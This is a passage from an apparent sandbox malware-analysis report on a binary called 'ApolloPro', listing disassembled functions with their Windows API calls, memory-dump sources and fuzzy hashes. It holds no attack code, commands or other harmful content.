                                                                                              • Instruction Fuzzy Hash: FD210432204204BEEB256F399C09EBB7B9EDF457A0F10512EFD09CA291EF61CC4193A0
                                                                                              Function 006BB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BB804
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006BB829
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006BB841
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 006BB86A
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006A155C,00000000), ref: 006BB888
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2294984445-0
                                                                                              • Opcode ID: 45ee2fc9318216e4f2dc59e3dc8d54164472247f4419be4ac3475e9042e0bebe
                                                                                              • Instruction ID: 1a57430fa2f981980521a4b246b4c1cfd800538894a10ebfd5f0aaeff6bc8f60
                                                                                              • Opcode Fuzzy Hash: 45ee2fc9318216e4f2dc59e3dc8d54164472247f4419be4ac3475e9042e0bebe
                                                                                              • Instruction Fuzzy Hash: 2C2182B1A14215EFCB149F39CC04AEA37AAFB05324F106639F921D62E0D7B09850CB80
                                                                                              Function 006A6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 006A6159
                                                                                              • GetForegroundWindow.USER32 ref: 006A6170
                                                                                              • GetDC.USER32(00000000), ref: 006A61AC
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 006A61B8
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 006A61F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: f57b063f9b7e48f546153bd196e8ff098bc101f3a9a23d608aa6cd2dc46fb687
                                                                                              • Instruction ID: b79f43fbe347e9e33d0cc31d1196c599164cebf9d54bd1b5c3690779b3dc6b91
                                                                                              • Opcode Fuzzy Hash: f57b063f9b7e48f546153bd196e8ff098bc101f3a9a23d608aa6cd2dc46fb687
                                                                                              • Instruction Fuzzy Hash: 6F216575A00104DFD754EF65DD85A6ABBFAEF49311F048469F94A97352CA70AC01CF90
                                                                                              Function 006316CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                              • BeginPath.GDI32(?), ref: 0063174F
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: e90484212e2e90957bd70dedee7e04424377852022081ee7a8137ff651d76575
                                                                                              • Instruction ID: 558d62f16c3a64f85e9bee6cff39eaebe911bcd740f8818b3d26f647828e51db
                                                                                              • Opcode Fuzzy Hash: e90484212e2e90957bd70dedee7e04424377852022081ee7a8137ff651d76575
                                                                                              • Instruction Fuzzy Hash: 1F218330A14208EFDB109F64DD49BB97BBBFB02351F185226F8259A2A0D7719996CFD0
                                                                                              Function 0068C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: c1f2d8144c31f30a3fb9de765f42f838b63deaf575956c0dd7db6b9ecfde5636
                                                                                              • Instruction ID: fecaf670f52eeacebf179cfc70ae616be3814169cd107fd86a139e3c8a7ad72b
                                                                                              • Opcode Fuzzy Hash: c1f2d8144c31f30a3fb9de765f42f838b63deaf575956c0dd7db6b9ecfde5636
                                                                                              • Instruction Fuzzy Hash: AD01F5E2A801153BD20072109C82FFB7B1FDA613A4F04822DFE069A741E770EE1583F5
                                                                                              Function 0069504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00695075
                                                                                              • __beginthreadex.LIBCMT ref: 00695093
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 006950A8
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006950BE
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006950C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3824534824-0
                                                                                              • Opcode ID: 3ec86ea0ad2ac4ea15af29e0be2a4ada1ac74b39fc11dd525556bc1cb0d1f030
                                                                                              • Instruction ID: 671d76537521a2f75e4f09a9908855c0ba9c10646be26e6132f8543d3cd1fb87
                                                                                              • Opcode Fuzzy Hash: 3ec86ea0ad2ac4ea15af29e0be2a4ada1ac74b39fc11dd525556bc1cb0d1f030
                                                                                              • Instruction Fuzzy Hash: D0110876908748BFDB018FAC9C04AEF7BAEEB45320F144256F815D3360D6719A4487F0
                                                                                              Function 00688E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
                                                                                              • GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 842720411-0
                                                                                              • Opcode ID: 00ea8e3dc56daa9bf28bdd474dba76e36b5e6ee196501152c103e4a335a987c0
                                                                                              • Instruction ID: dbfe64cf2d20e827473c62a076781a5fc7a27c44dffad7a6662fce41ab3c1810
                                                                                              • Opcode Fuzzy Hash: 00ea8e3dc56daa9bf28bdd474dba76e36b5e6ee196501152c103e4a335a987c0
                                                                                              • Instruction Fuzzy Hash: EB011D71641204FFEB205FA6DC4CDBB7BAEEF89755B540669F849C3220DA319C10DB60
                                                                                              Function 006957FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0069581B
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00695829
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695831
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0069583B
                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00695877
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 1e5ce51262680ab1baf51b2adc973272c74ecc08b14c195b88c691b080423dba
                                                                                              • Instruction ID: 1e17bc28d113d55a5eec00c555c9928c322bad09465c3d070831c63f78ad03e6
                                                                                              • Opcode Fuzzy Hash: 1e5ce51262680ab1baf51b2adc973272c74ecc08b14c195b88c691b080423dba
                                                                                              • Instruction Fuzzy Hash: CF012971D01A2DDBDF019FE9EA499EDBBBEFB08711F014556E502F2640DB309550CBA1
                                                                                              Function 00687D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?,?,00688073), ref: 00687D45
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D60
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D6E
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?), ref: 00687D7E
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00687C62,80070057,?,?), ref: 00687D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: b125b17ecbab7bea5af5d588577a3f30942a5c2a36c479622c0c4418cf7f9ee1
                                                                                              • Instruction ID: c3cd305d69dc13c424c5a8b7c42b40649356e2b7473f92b168ed17953d83dcea
                                                                                              • Opcode Fuzzy Hash: b125b17ecbab7bea5af5d588577a3f30942a5c2a36c479622c0c4418cf7f9ee1
                                                                                              • Instruction Fuzzy Hash: FD015A72606214EBEB115F54DC44BBABBAEEF48792F249124F908D6210D771ED409BA0
                                                                                              Function 00688CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00688CDE
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00688CE8
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00688CF7
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00688CFE
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00688D14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 662192ce1ee281c62400ca8012595ad3720e9bfdf7cec15c2bbde6d670aaaab2
                                                                                              • Instruction ID: f0b01defefc1d2d0e521b93e522a87591110e8e3ece6ff02430c58decfbfdae2
                                                                                              • Opcode Fuzzy Hash: 662192ce1ee281c62400ca8012595ad3720e9bfdf7cec15c2bbde6d670aaaab2
                                                                                              • Instruction Fuzzy Hash: 21F0A934200208AFEB101FE5DC88EBB3BAEFF89754F505229F904C3290CB60AC41DB60
                                                                                              Function 00688D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00688D3F
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00688D49
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D58
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D5F
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 721248721dcc9c4c9f8501e1cf439ee6718d3e39adf2c80ad75c5409f7e825b8
                                                                                              • Instruction ID: 42f04653f6196f58bfe189541f33addb351586caeb7a1d447635f60707dec471
                                                                                              • Opcode Fuzzy Hash: 721248721dcc9c4c9f8501e1cf439ee6718d3e39adf2c80ad75c5409f7e825b8
                                                                                              • Instruction Fuzzy Hash: 11F04F31240204EFEB111FA9EC88FB73BAEEF89755F541615F945C7290CB619D41DB60
                                                                                              Function 0068CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CD90
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0068CDA7
                                                                                              • MessageBeep.USER32(00000000), ref: 0068CDBF
                                                                                              • KillTimer.USER32(?,0000040A), ref: 0068CDDB
                                                                                              • EndDialog.USER32(?,00000001), ref: 0068CDF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: b7bfc3921552ee8dbcc4dd4849ed564d3392608ecd27e8b3e0ec23d1b262d490
                                                                                              • Instruction ID: d2b3a0617232002c74171f807b8dfde19e7876570ddb11a646513629cc647cdd
                                                                                              • Opcode Fuzzy Hash: b7bfc3921552ee8dbcc4dd4849ed564d3392608ecd27e8b3e0ec23d1b262d490
                                                                                              • Instruction Fuzzy Hash: DB016D30504708ABFB217F61DD4EFA67BBAFF00715F001669A582A11E1DBF0A994CBA0
                                                                                              Function 0063178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EndPath.GDI32(?), ref: 0063179B
                                                                                              • StrokeAndFillPath.GDI32(?,?,0066BBC9,00000000,?), ref: 006317B7
                                                                                              • SelectObject.GDI32(?,00000000), ref: 006317CA
                                                                                              • DeleteObject.GDI32 ref: 006317DD
                                                                                              • StrokePath.GDI32(?), ref: 006317F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: f8db6125c253a89d4a1d5cf70c9ecca498591f270d6c52a80517475c98638e16
                                                                                              • Instruction ID: 93c5fc79f85440898ea3cdd219612e6cff256d609b11f941c6eb2aaa5778ce5c
                                                                                              • Opcode Fuzzy Hash: f8db6125c253a89d4a1d5cf70c9ecca498591f270d6c52a80517475c98638e16
                                                                                              • Instruction Fuzzy Hash: E3F0C930118208EBEB115F25EC4CB793BB7A7023A6F18A224E479592F0C7314AA5DF51
                                                                                              Function 0069C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 0069CA75
                                                                                              • CoCreateInstance.OLE32(006C3D3C,00000000,00000001,006C3BAC,?), ref: 0069CA8D
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • CoUninitialize.OLE32 ref: 0069CCFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 2683427295-24824748
                                                                                              • Opcode ID: ae36a3c71bc6ebe857f907f9061e7927ef3148a92e3a6ff8438400219e4bddc8
                                                                                              • Instruction ID: ac7b2acfdd100c30e621dc6d8b53a5010f55f4a41ae171cbe4b95721bba4033b
                                                                                              • Opcode Fuzzy Hash: ae36a3c71bc6ebe857f907f9061e7927ef3148a92e3a6ff8438400219e4bddc8
                                                                                              • Instruction Fuzzy Hash: FEA15A71504205AFD340EF64D881EABB7EEEF95314F00491CF1569B2A2EB70EE49CB96
                                                                                              Function 0063E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 00641680: _memmove.LIBCMT ref: 006416DB
                                                                                              • __swprintf.LIBCMT ref: 0063E598
                                                                                              Strings
                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0063E431
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                              • API String ID: 1943609520-557222456
                                                                                              • Opcode ID: f2f595718fe79497186fcbd52dac5a7cbaefbbff4c37502513a461ed0bd39c4b
                                                                                              • Instruction ID: a1435ff29d4ed2d9eb809990a064501a9830303a9b276f38c20c3c92db4d80d0
                                                                                              • Opcode Fuzzy Hash: f2f595718fe79497186fcbd52dac5a7cbaefbbff4c37502513a461ed0bd39c4b
                                                                                              • Instruction Fuzzy Hash: A391D1715043019FC754EF24C886CAEB7A6EF86310F00491DF8869B2E1EB71EE45CBA6
                                                                                              Function 0065523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 006552CD
                                                                                                • Part of subcall function 00660320: __87except.LIBCMT ref: 0066035B
                                                                                              Strings
                                                                                              Memory Dump Source
